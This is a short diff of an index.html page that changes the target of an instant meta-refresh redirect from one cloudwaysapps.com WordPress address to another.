--- a/index.html
+++ b/index.html
@@ -1,7 +1,7 @@
 <!DOCTYPE html>
 <html>
   <head>
-    <meta http-equiv="Refresh" content="0; url=https://wordpress-864011-2986798.cloudwaysapps.com/rbu
+    <meta http-equiv="Refresh" content="0; url=https://wordpress-887964-3078644.cloudwaysapps.com/cibcvu
 " />
   </head>
   <body>
